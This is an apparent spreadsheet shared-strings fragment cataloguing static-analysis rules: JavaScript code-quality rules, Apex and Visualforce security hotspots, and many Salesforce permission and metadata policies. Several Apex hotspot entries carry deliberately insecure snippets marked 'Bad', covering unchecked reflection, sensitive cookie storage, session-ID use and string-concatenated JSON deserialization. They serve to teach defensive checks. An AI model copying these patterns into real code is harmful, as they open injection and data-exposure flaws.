  </si>
  <si>
    <t>javascript:S1788</t>
  </si>
  <si>
    <t>Function parameters with default values should be last</t>
  </si>
  <si>
    <t>&lt;p&gt;The ability to define default values for function parameters can make a function easier to use. Default parameter values allow callers to specify
as many or as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code.&lt;/p&gt;
&lt;p&gt;But all function parameters with default values should be declared after the function parameters without default values. Otherwise, it makes it
impossible for callers to take advantage of defaults; they must re-specify the defaulted values or pass &lt;code&gt;undefined&lt;/code&gt; in order to "get to"
the non-default parameters.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function multiply(a = 1, b) {  // Noncompliant
  return a*b;
}
var x = multiply(42);  // returns NaN as b is undefined
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function multiply(b, a = 1) {
  return a*b;
}
var x = multiply(42);  // returns 42 as expected
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2817</t>
  </si>
  <si>
    <t>Web SQL databases should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some
browsers. (It is not supported in Firefox or IE.)&lt;/p&gt;
&lt;p&gt;Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities"&gt;OWASP Top 10 2017 Category A9&lt;/a&gt; - Using
  Components with Known Vulnerabilities &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S2692</t>
  </si>
  <si>
    <t>"indexOf" checks should not be for positive numbers</t>
  </si>
  <si>
    <t>&lt;p&gt;Most checks against an &lt;code&gt;indexOf&lt;/code&gt; call against an array compare it with -1 because 0 is a valid index. Any checks which look for values
&amp;gt;0 ignore the first element, which is likely a bug. If youâ€™re merely checking the presence of the element, consider using &lt;code&gt;includes&lt;/code&gt;
instead. Before using&amp;nbsp;&lt;code&gt;includes&lt;/code&gt; method make sure that your browser version is supporting it.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var color = "blue";
var name = "ishmael";
var arr = [color, name];
if (arr.indexOf("blue") &amp;gt; 0) { // Noncompliant
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var color = "blue";
var name = "ishmael";
var arr = [color, name];
if (arr.indexOf("blue") &amp;gt;= 0) {
  // ...
}
if (arr.includes("blue")) {
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/includes"&gt;Array.prototype.includes()&lt;/a&gt;
documentation at MDN&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S3776</t>
  </si>
  <si>
    <t>Cognitive Complexity of functions should not be too high</t>
  </si>
  <si>
    <t>&lt;p&gt;Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be
difficult to maintain.&lt;/p&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://redirect.sonarsource.com/doc/cognitive-complexity.html"&gt;Cognitive Complexity&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>APEX SECURITY HOTSPOTS</t>
  </si>
  <si>
    <t>key</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>mdDesc</t>
  </si>
  <si>
    <t>severity</t>
  </si>
  <si>
    <t>langName</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>Dynamically executing code is security-sensitive.  If the code comes from an untrusted source, the untrusted source may be able to choose which code to run.&lt;br/&gt;\nThis vulnerability can lead to:\n&lt;br/&gt;&lt;ul&gt;\n&lt;li&gt;Unintended modification of the system state.&lt;/li&gt;\n&lt;li&gt;Errors and/or termination of the application.&lt;/li&gt;\n&lt;li&gt;Leaking of sensitive information in an error message.&lt;/li&gt;&lt;br/&gt;\n&lt;br/&gt;\n&lt;h2&gt;See&lt;/h2&gt; \n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/95.html"&gt;MITRE CWE-95&lt;/a&gt; - Improper Neutralization of Directives in Dynamically Evaluated Code\n  ('Eval Injection') &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/470.html"&gt;MITRE CWE-470&lt;/a&gt; - Use of Externally-Controlled Input to Select Classes or Code\n  ('Unsafe Reflection') &lt;/li&gt;\n  &lt;li&gt; OWASP Top 10 2017 Category A1 - Injection &lt;/li&gt;\n  &lt;li&gt; OWASP Top 10 2017 Category A7 - Cross-Site Scripting (XSS) &lt;/li&gt;\n&lt;/ul&gt;\n      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\npublic MyController {\n  private interface Implementation{\n    void run();\n  }\n  private class AdminImplementation implements Implementation{\n    public void run(){\n      ... do something privileged\n    }\n  }\n  private class StandardImplementation implements Implementation{\n    public void run(){\n	  ... normal implementation\n    }\n  }\n\n  public void init(){\n    Implementation i = Type.forName(implementationName);\n      i.run(); //Bad: This unchecked implementation could lead to unexpectedly running the AdminImplementation code.\n  }\n\n}\n      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Encrypting data is security-sensitive. Although most encryption problems are solved or managed by Salesforce, care must be taken when relying on encryption.&lt;br/&gt;\n&lt;br/&gt;\nSee &lt;a href="https://developer.salesforce.com/page/Secure_Coding_Storing_Secrets"&gt;Storing Sensitive Data&lt;/a&gt; for more information.&lt;br/&gt;\n&lt;br/&gt;\nFor example:&lt;br/&gt;\n&lt;ul&gt;\n	&lt;li&gt;Ensure that keys are generated randomly&lt;/li&gt;\n	&lt;li&gt;That keys are stored securely in a Protected Custom Setting or Protected Custom Metadata type&lt;/li&gt;\n	&lt;li&gt;Never store keys in Apex classes&lt;/li&gt;\n	&lt;li&gt;You may want to consider a key-rotation scheme&lt;/li&gt;\n	&lt;li&gt;Consider whether the keys can be leaked: have the keys been downloaded to an unsecure site, for example&lt;/li&gt;\n&lt;/ul&gt;\n&lt;br/&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/522.html"&gt;MITRE, CWE-522&lt;/a&gt; - Insufficiently Protected Credentials &lt;/li&gt;\n  &lt;li&gt; [OWASP Top 10 2017 Category A3 - Sensitive Data Exposure &lt;/li&gt;\n  &lt;li&gt; [OWASP Top 10 2017 Category A6 - Security Misconfiguration &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.&lt;br/&gt;\n	&lt;br/&gt;\n  &lt;h2&gt;See&lt;/h2&gt;\n  &lt;ul&gt;\n	  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/312.html"&gt;MITRE, CWE-312&lt;/a&gt; - Cleartext Storage of Sensitive Information &lt;/li&gt;\n	  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/315.html"&gt;MITRE, CWE-315&lt;/a&gt; - Cleartext Storage of Sensitive Information in a Cookie &lt;/li&gt;\n	  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/565.html"&gt;MITRE CWE-565&lt;/a&gt; - Reliance on Cookies without Validation and Integrity Checking &lt;/li&gt;\n	  &lt;li&gt; OWASP Top 10 2017 Category A1 - Injection &lt;/li&gt;\n	  &lt;li&gt; OWASP Top 10 2017 Category A3 - Sensitive Data Exposure &lt;/li&gt;\n	  &lt;li&gt; &lt;a href="https://wiki.sei.cmu.edu/confluence/display/java/FIO52-J.+Do+not+store+unencrypted+sensitive+information+on+the+client+side"&gt;CERT,\n	  FIO52-J.&lt;/a&gt; - Do not store unencrypted sensitive information on the client side &lt;/li&gt;\n	  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#COOKIE_USAGE"&gt;COOKIE_USAGE&lt;/a&gt; &lt;/li&gt;\n	&lt;/ul&gt;\n  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n  Cookie userCookie = new Cookie('CookieName', fieldValueToBeStoredAsCookie, null, 315569260, false);\n  ApexPages.currentPage().setCookies(new Cookie[] {\n      userCookie     //Bad: The cookie could be targeted by attackers to get access to sensitive information.\n  });\n\n  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>The use of UserInfo.GetSessionId() is security-sensitive. Ensure that you need to do this.\n&lt;br/&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/807"&gt;MITRE, CWE-807&lt;/a&gt; - Reliance on Untrusted Inputs in a Security Decision &lt;/li&gt;\n  &lt;li&gt; OWASP Top 10 2017 Category A2 - Broken Authentication and Session Management&lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;\n&lt;/ul&gt;\n\n      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n//Make sure you need to call the UserInfo.getSessionId() method.      \n\n//....\nHttpRequest req = new HttpRequest();\nreq.setHeader('Authorization', 'Bearer ' + UserInfo.getSessionId());   //There may be a workaround for this.\n//....\n      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Deserializing an object from an untrusted source is security-sensitive. An attacker could modify the content of the data.&lt;br/&gt;\n&lt;br/&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/502.html"&gt;MITRE, CWE-502&lt;/a&gt; - Deserialization of Untrusted Data &lt;/li&gt;\n  &lt;li&gt; OWASP Top 10 2017 Category A8 - Insecure Deserialization &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Deserialization_of_untrusted_data"&gt;OWASP Deserialization of untrusted data&lt;/a&gt; &lt;/li&gt;\n  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#OBJECT_DESERIALIZATION"&gt;OBJECT_DESERIALIZATION &lt;/a&gt; &lt;/li&gt;\n&lt;/ul&gt;\n  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\nclass Car{ \n  \n  private String make;\n  private String year;\n  \n  public void createCar(String z, String x){ \n    Car c = (Car)JSON.deserializeStrict(\n      '{"make":"'+ z + '","year":"' + x + '"}', Car.class);   //Bad: Unknown inputs are used to create the object.\n  }\n}\n\n  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>VISUALFORCE AND LIGHTNING SECURITY HOTSPOTS</t>
  </si>
  <si>
    <t>The use of GETSESSIONID() and $API.Session_Id is security-sensitive. Ensure that you need to do this.\n\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/807"&gt;MITRE, CWE-807&lt;/a&gt; - Reliance on Untrusted Inputs in a Security Decision &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;\n  &lt;li&gt; OWASP Top 10 2017 Category A2 - Broken Authentication &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>SALESFORCE METADATA RULES</t>
  </si>
  <si>
    <t>sfmeta:AvoidAllRecordPermissions</t>
  </si>
  <si>
    <t>Object Permissions should not be permissive</t>
  </si>
  <si>
    <t>'Allow Delete', 'Modify All Records' and 'View All Records' Should be "false" for Standard Object "Account" in Object Permissions
This rule requires .profile metadata to be downloaded.</t>
  </si>
  <si>
    <t>Salesforce Metadata</t>
  </si>
  <si>
    <t>common-sfmeta:InsufficientBranchCoverage</t>
  </si>
  <si>
    <t>common-sfmeta:InsufficientLineCoverage</t>
  </si>
  <si>
    <t>common-sfmeta:DuplicatedBlocks</t>
  </si>
  <si>
    <t>common-sfmeta:SkippedUnitTests</t>
  </si>
  <si>
    <t>Limit number of Custom Profiles with Modify All Data Permission</t>
  </si>
  <si>
    <t>Custom profiles with â€œModify All Dataâ€ permissions can be extremely risky and can open the door to user-inflicted data loss and corruption.
    Limit the number of custom profiles with â€œModify All Dataâ€ permissions. Best practice is to have no custom profiles that can modify all of your Salesforce data.</t>
  </si>
  <si>
    <t>codescan-policy:PermissionSetDeveloperPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Developer Policy</t>
  </si>
  <si>
    <t>PermissionSet - Developer Policy gives visibility on access permissions related to Author APEX, Import Custom Objects.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</si>
  <si>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codescan-policy:ProfileDataAdminPolicy</t>
  </si>
  <si>
    <t>Profile - Data Admin Policy</t>
  </si>
  <si>
    <t>Profile - Data Admin Policy gives visibility on access permissions related to Manage Data Categories, View All Data, Manage Data Integrations, ModifyAllData , View Encrypted Data, Weekly Data Export, Edit Read Only Fields.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</si>
  <si>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codescan-policy:ProfilePlatformAdminPolicy</t>
  </si>
  <si>
    <t>Profile - Platform Admin Policy</t>
  </si>
  <si>
    <t>Profile - Platform Admin Policy gives visibility on Platform Admin permissions.&lt;br/&gt;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</si>
  <si>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sfmeta:WorkflowWithoutProduct</t>
  </si>
  <si>
    <t>Workflow Must Reference Product</t>
  </si>
  <si>
    <t>For general automation and validation best practices, associate actions in the system to a product line, product type,
 or product feature.
 &lt;br/&gt;&lt;br/&gt;
 This rule is specifically for nCino implementations and is not relevant outside of that.
 If you are not using nCino in your Org, do not activate this rule.
 nCino specific rules can be determined by the tag ncino-specific.</t>
  </si>
  <si>
    <t>sfmeta:SharingRecordTypeId</t>
  </si>
  <si>
    <t>Record Type ID is Missing</t>
  </si>
  <si>
    <t>Record Type ID Value is Missing in Criteria Items Tag under Sharing Criteria Rules
This rule requires .sharingRules metadata to be downloaded with an API version greater than 32.0.</t>
  </si>
  <si>
    <t>sfmeta:ProcessBuilderWithoutProduct</t>
  </si>
  <si>
    <t>Process Builder Must Reference Product</t>
  </si>
  <si>
    <t>For general automation and validation best practices, associate actions in the system to a product line, product type,
 or product feature. Depending on how widespread the automation is, this ensures that follow-on phases for new lines of
  business have limited rework. This also ensures optimal performance on automation that runs on Objects, such as Loan,
   that span many different lines of business.
   &lt;br/&gt;&lt;br/&gt;
   This rule is specifically for nCino implementations and is not relevant outside of that.
   If you are not using nCino in your Org, do not activate this rule.
   nCino specific rules can be determined by the tag ncino-specific.</t>
  </si>
  <si>
    <t>codescan-policy:ProfileSessionPolicy</t>
  </si>
  <si>
    <t>Profile - Session Policy</t>
  </si>
  <si>
    <t>Profile - Session Policy gives visibility on access permissions related to Required Session Level and Session Timeout Limit.&lt;br/&gt;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href="https://cwe.mitre.org/data/definitions/284"&gt;MITRE, CWE-284&lt;/a&gt; - Improper Access Control &lt;/li&gt;
&lt;li&gt; OWASP Top 10 2021 Category A01 â€“ Broken Access Control &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>codescan-policy:ProfileUserMgmtPolicy</t>
  </si>
  <si>
    <t>Profile - User Management Policy</t>
  </si>
  <si>
    <t>Profile - User Management Policy gives visibility on access permissions related to Manage Users, Manage Roles, Assign Permission Sets,
 Reset Passwords and Manage Internal Users.&lt;br/&gt;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</si>
  <si>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codescan-policy:OrganizationPasswordPolicy</t>
  </si>
  <si>
    <t>Organization - Password Policy</t>
  </si>
  <si>
    <t>Organization - Password Policy gives visibility on access permissions related to Passwords Expiry, Enforce password History, Minimum Password Length,
Password Complexity Requirement, Password Question Requirement, Maximum Invalid Login Attempts, Lockout Effective period, Obscure answer for password resets,
Require minimum One Day password lifetime.&lt;br/&gt;
&lt;br/&gt;
This violation means that there is conflict with your policy for these settings.
&lt;br/&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
Review this configuration. If the permissions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</si>
  <si>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codescan-policy:PermissionSetApiAdminPolicy</t>
  </si>
  <si>
    <t>PermissionSet - API Admin Policy</t>
  </si>
  <si>
    <t>PermissionSet - API Admin Policy gives visibility on access permissions related to  Modify Metadata Through Metadata API Functions,
Bulk API Hard Delete, API Enabled, Multi-Factor Authentication for API Logins, Manage Multifactor Auth - API, Apex REST Services,
Access Customer Asset Lifecycle Management APIs, Update Consent Preferences Using REST API.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</si>
  <si>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Limit number of Page Layouts per object</t>
  </si>
  <si>
    <t>As the number of page layouts per object increases, the performance of Salesforce org decreases.
The rule is intended to restrict the maximum number of page layouts that can be accommodated under a single object.</t>
  </si>
  <si>
    <t>codescan-policy:PermissionSetPackagesAdminPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Packages Admin Policy</t>
  </si>
  <si>
    <t>PermissionSet - Packages Admin Policy gives visibility on access permissions related to Create and Update Second-Generation Packages,
Delete Second-Generation Packages, Manage Package Licenses, Download AppExchange Packages, Create AppExchange Packages, Upload AppExchange Packages.&lt;br/&gt;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</si>
  <si>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codescan-policy:PermissionSetFilesAndContentPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Files and Content Policy</t>
  </si>
  <si>
    <t>PermissionSet - Files and Content Policy gives visibility on access permissions related to  Files Connect Cloud.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</si>
  <si>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codescan-policy:ProfileSecuritySettingsPolicy</t>
  </si>
  <si>
    <t>Profile - Security Settings Policy</t>
  </si>
  <si>
    <t>Profile - Security Settings Policy gives visibility on access permissions related to IP Restrict Requests,Manage Certificates,Manage IP Addresses,Manage Encryption Keys,View Threat Detection Events,Profile allows Manage Security Center.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</si>
  <si>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codescan-policy:OrganizationSessionPolicy</t>
  </si>
  <si>
    <t>Organization - Session Policy</t>
  </si>
  <si>
    <t>Organization - Session Policy gives visibility on access permissions related to Session Timeout, Enforce login IP ranges on every request.&lt;br/&gt;
&lt;br/&gt;
This violation means that there is conflict with your policy for these settings.
&lt;br/&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
Review this configuration. If the permissions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href="https://cwe.mitre.org/data/definitions/284"&gt;MITRE, CWE-284&lt;/a&gt; - Improper Access Control &lt;/li&gt;
&lt;li&gt; OWASP Top 10 2021 Category A01 â€“ Broken Access Control &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>codescan-policy:PermissionSetDataAdminPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Data Admin Policy</t>
  </si>
  <si>
    <t>PermissionSet - Data Admin Policy gives visibility on access permissions related to Manage Data Categories, View All Data, Manage Data Integrations, ModifyAllData , View Encrypted Data, Weekly Data Export, Edit Read Only Fields.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</si>
  <si>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codescan-policy:ProfilePackagesAdminPolicy</t>
  </si>
  <si>
    <t>Profile - Packages Admin Policy</t>
  </si>
  <si>
    <t>Profile - Packages Admin Policy gives visibility on access permissions related to Packaging2, Packaging2Delete, ManagePackageLicenses,
InstallPackaging, CreatePackaging, PublishPackaging.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</si>
  <si>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codescan-policy:PermissionSetUserMgmtPolicy</t>
  </si>
  <si>
    <t>PermissionSet - User Management Policy</t>
  </si>
  <si>
    <t>PermissionSet - User Management Policy gives visibility on access permissions related to Manage Users, Manage Roles, Assign Permission Sets,
Reset Passwords and Manage Internal Users.&lt;br/&gt;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</si>
  <si>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codescan-policy:PermissionSetPlatformAdminPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Platform Admin Policy</t>
  </si>
  <si>
    <t>PermissionSet - Platform Admin Policy gives visibility on Platform Admin permissions.&lt;br/&gt;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</si>
  <si>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codescan-policy:ProfilePermissionsAdminPolicy</t>
  </si>
  <si>
    <t>Profile - Permissions Admin Policy</t>
  </si>
  <si>
    <t>Profile - Permissions Admin Policy gives visibility on access permissions related to Manage Profiles and Permission Sets,
Manage Sharing, Multi-Factor Authentication for User Interface Logins, Manage Auth. Providers, Manage Custom Permissions,
Manage Login Access Policies, Manage Password Policies, Allow Password Never Expires, Manage Session Permission Set Activations,
Exempt from Transaction Security, Waive Multi-Factor Authentication for Exempt Users.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</si>
  <si>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codescan-policy:ProfileFlowsPolicy</t>
  </si>
  <si>
    <t>Profile - Flows Policy</t>
  </si>
  <si>
    <t>Profile - Flows Policy gives visibility on access permissions related to Run Flows, Flows Policy, Manage Flow.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href="https://cwe.mitre.org/data/definitions/269"&gt;MITRE, CWE-269&lt;/a&gt; - Improper Privilege Management &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A01 â€“ Broken Access Control &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>codescan-policy:ProfileApiAdminPolicy</t>
  </si>
  <si>
    <t>Profile - API Admin Policy</t>
  </si>
  <si>
    <t>Profile - API Admin Policy gives visibility on API Admin permissions.&lt;br/&gt;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</si>
  <si>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codescan-policy:PermissionSetFlowsPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Flows Policy</t>
  </si>
  <si>
    <t>PermissionSet - Flows Policy gives visibility on access permissions related to Run Flows, Flows Policy, Manage Flow.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href="https://cwe.mitre.org/data/definitions/269"&gt;MITRE, CWE-269&lt;/a&gt; - Improper Privilege Management &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A01 â€“ Broken Access Control &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>codescan-policy:PermissionSetReportsAndDashboardsAdminPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Reports And Dashboards Admin Policy</t>
  </si>
  <si>
    <t>PermissionSet - Reports And Dashboards Admin Policy gives visibility on access permissions related to  Manage All Private Reports and Dashboards,
Create and Customize Reports, Manage Reports in Public Folders, Manage Dashboards in Public Folders, Manage Custom Report Types, Report Builder, Report Builder (Lightning Experience),
Run Reports, Create and Customize Dashboards, Manage Dynamic Dashboards, Export Reports.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</si>
  <si>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codescan-policy:PermissionSetPermissionsAdminPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Permissions Admin Policy</t>
  </si>
  <si>
    <t>PermissionSet - Permissions Admin Policy gives visibility on access permissions related to Manage Profiles and Permission Sets,
Manage Sharing, Multi-Factor Authentication for User Interface Logins, Manage Auth. Providers, Manage Custom Permissions,
Manage Login Access Policies, Manage Password Policies, Allow Password Never Expires, Manage Session Permission Set Activations,
Exempt from Transaction Security, Waive Multi-Factor Authentication for Exempt Users.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</si>
  <si>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codescan-policy:ProfileDeveloperPolicy</t>
  </si>
  <si>
    <t>Profile - Developer Policy</t>
  </si>
  <si>
    <t>Profile - Developer Policy gives visibility on access permissions related to Author APEX, Import Custom Objects.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</si>
  <si>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codescan-policy:ProfilePasswordPolicy</t>
  </si>
  <si>
    <t>Profile - Password Policy</t>
  </si>
  <si>
    <t>Profile - Password Policy gives visibility on access permissions related to Passwords Expiry, Enforce password History, Minimum Password Length,
Password Complexity Requirement, Password Question Requirement, Maximum Invalid Login Attempts, Lockout Effective period, Obscure answer for password resets,
Require minimum One Day password lifetime, Don't Immediately expire links in forgot password emails.&lt;br/&gt;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</si>
  <si>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codescan-policy:ProfileReportsAndDashboardsAdminPolicy</t>
  </si>
  <si>
    <t>Profile - Reports and Dashboards Admin Policy</t>
  </si>
  <si>
    <t>Profile - Reports and Dashboards Admin Policy gives visibility on access permissions related to Create Report Folders, Manage All Private Reports and Dashboards,
Create and Customize Reports, Manage Reports in Public Folders, Manage Dashboards in Public Folders, Manage Custom Report Types, Report Builder, Report Builder (Lightning Experience),
Run Reports, Create and Customize Dashboards, Manage Dynamic Dashboards, Export Reports.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</si>
  <si>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codescan-policy:PermissionSetSecuritySettingsPolicy</t>
  </si>
  <si>
    <t>PermissionSet - Security Settings Policy</t>
  </si>
  <si>
    <t>PermissionSet - Security Settings Policy gives visibility on access permissions related to Manage Certificates,Manage IP Addresses,Manage Encryption Keys,View Threat Detection Events,Profile allows Manage Security Center.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</si>
  <si>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codescan-policy:ProfileFilesAndContentPolicy</t>
  </si>
  <si>
    <t>Profile - Files and Content Policy</t>
  </si>
  <si>
    <t>Profile - Files and Content Policy gives visibility on access permissions related to Query All Files, Files Connect Cloud, Manage Salesforce CRM Content, Manage Content Permissions, Manage Content Properties.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</si>
  <si>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sfmeta:ExternalIdOveruse</t>
  </si>
  <si>
    <t>Potential Overuse - External IDs</t>
  </si>
  <si>
    <t>Salesforce does not allow more than 5 External IDs per object.</t>
  </si>
  <si>
    <t>sfmeta:ExcessWorkflowsPerObject</t>
  </si>
  <si>
    <t>Avoid Excess Workflow Rules per Object</t>
  </si>
  <si>
    <t>Objects which contain too many decisions are complex and difficult to maintain.</t>
  </si>
  <si>
    <t>sfmeta:CrossObjectFormulaOveruse</t>
  </si>
  <si>
    <t>Potential Overuse - Cross-Object Formulas</t>
  </si>
  <si>
    <t>Salesforce does not allow more than 15 cross-object formulas per object.</t>
  </si>
  <si>
    <t>sfmeta:RelationShipOveruse</t>
  </si>
  <si>
    <t>Potential Overuse - Relationship Objects</t>
  </si>
  <si>
    <t>Salesforce does not allow more than 40 relationships per object.</t>
  </si>
  <si>
    <t>sfmeta:ExcessiveWorkflowsOrgWide</t>
  </si>
  <si>
    <t>Avoid Excess Workflow Rules in Org</t>
  </si>
  <si>
    <t>This rule helps to limit the number of workflow rules in your salesforce org. This ensures that the workflow rules will not be overloading the system by doing extensive calculations
 whenever a record is created or updated.
 &lt;br/&gt;
 As per the &lt;a href="https://help.salesforce.com/s/articleView?id=sf.workflow_limits.htm&amp;type=5"&gt;
 Salesforce documentation&lt;/a&gt;, the limit for workflow rules per org is 2000.</t>
  </si>
  <si>
    <t>sfmeta:CustomFieldSecurityInStandardObject</t>
  </si>
  <si>
    <t>Use Page Layout or FLS to mark CustomField as required</t>
  </si>
  <si>
    <t>The custom fields should be marked as required on standard/shared objects through page layout or field level security rather than at system level.</t>
  </si>
  <si>
    <t>Limit number of Custom Fields per object</t>
  </si>
  <si>
    <t>Having a large number of custom fields per object impacts the performance of queries.
This rule gives the flexibility to configure a limit on the number of fields that can be associated with an object.
 &lt;br/&gt;
 &lt;a href="https://help.salesforce.com/s/articleView?id=sf.custom_field_allocations.htm&amp;type=5"&gt;
 Salesforce Custom Field limits across editions&lt;/a&gt;</t>
  </si>
  <si>
    <t>sfmeta:FlowDecisionLimit</t>
  </si>
  <si>
    <t>Flow Decision Limits</t>
  </si>
  <si>
    <t>Flows which contain too many decisions are complex and difficult to maintain.
 Consider reducing the number of decisions or utilizing Apex.</t>
  </si>
  <si>
    <t>sfmeta:ObjectLookupsOveruse</t>
  </si>
  <si>
    <t>Potential Overuse - Object Lookups</t>
  </si>
  <si>
    <t>Salesforce does not allow more than 25 Lookup relationships on a single custom object.</t>
  </si>
  <si>
    <t>sfmeta:ExceedsMaxAllowedComponentsPerType</t>
  </si>
  <si>
    <t>Avoid Excess Components for Objects</t>
  </si>
  <si>
    <t>This rule helps to limit the number of sharing, workflow and validation rules that can be created
 on an object. This ensures that the components will not be overloading the system by doing extensive calculations
 whenever a record is created or updated.
&lt;br/&gt;
&lt;br/&gt;
Default Limits&lt;br/&gt;
Sharing rules should not be more than specified limit per object.
Default Limit: 19 per objects.
&lt;br/&gt;
Active validation rules should not be more than specified limit per object.
Default Limit: 10 per objects.
&lt;br/&gt;
Active Workflow rules should not be more than specified limit per object.
Default Limit: 10 per objects.
&lt;br/&gt;
Inactive Validation rules should not be more than specified limit per object.
Default Limit: 3 per objects.
&lt;br/&gt;
Inactive Workflow rules should not be more than specified limit per object.
Default Limit: 3 per objects.
&lt;br/&gt;
&lt;br/&gt;
Steps to resolve
&lt;br/&gt;
Remove the rules which are redundant or obsolete.</t>
  </si>
  <si>
    <t>common-sfmeta:InsufficientCommentDensity</t>
  </si>
  <si>
    <t>sfmeta:XPathRule</t>
  </si>
  <si>
    <t>CodeScan provides a very handy method for creating new rules by writing an XPath query. When the XPath query finds a match, a violation is created.
    Let's take a simple example : assume we only want a single form on each metadata fle. 
  See our &lt;a href="https://knowledgebase.autorabit.com/codescan/docs/creating-custom-rules-with-xpath-for-codescan-cloud/"&gt;Custom Rules tutorial&lt;/a&gt; for more information.</t>
  </si>
  <si>
    <t>Limit number of System Administrators</t>
  </si>
  <si>
    <t>This rules checks the number of System Administrators for a Salesforce org.
    &lt;br/&gt;
    Suggested Solution
    &lt;br/&gt;
    Leverage the delegate admin profile option or make custom profiles for these users and make sure
     they can only access the data that is absolutely essential.</t>
  </si>
  <si>
    <t>sfmeta:ValidationRuleWithoutProduct</t>
  </si>
  <si>
    <t>Validation Rule Must Reference Product</t>
  </si>
  <si>
    <t>sfmeta:SystemBypassLogicValidation</t>
  </si>
  <si>
    <t>System Bypass Logic - Validation Rules</t>
  </si>
  <si>
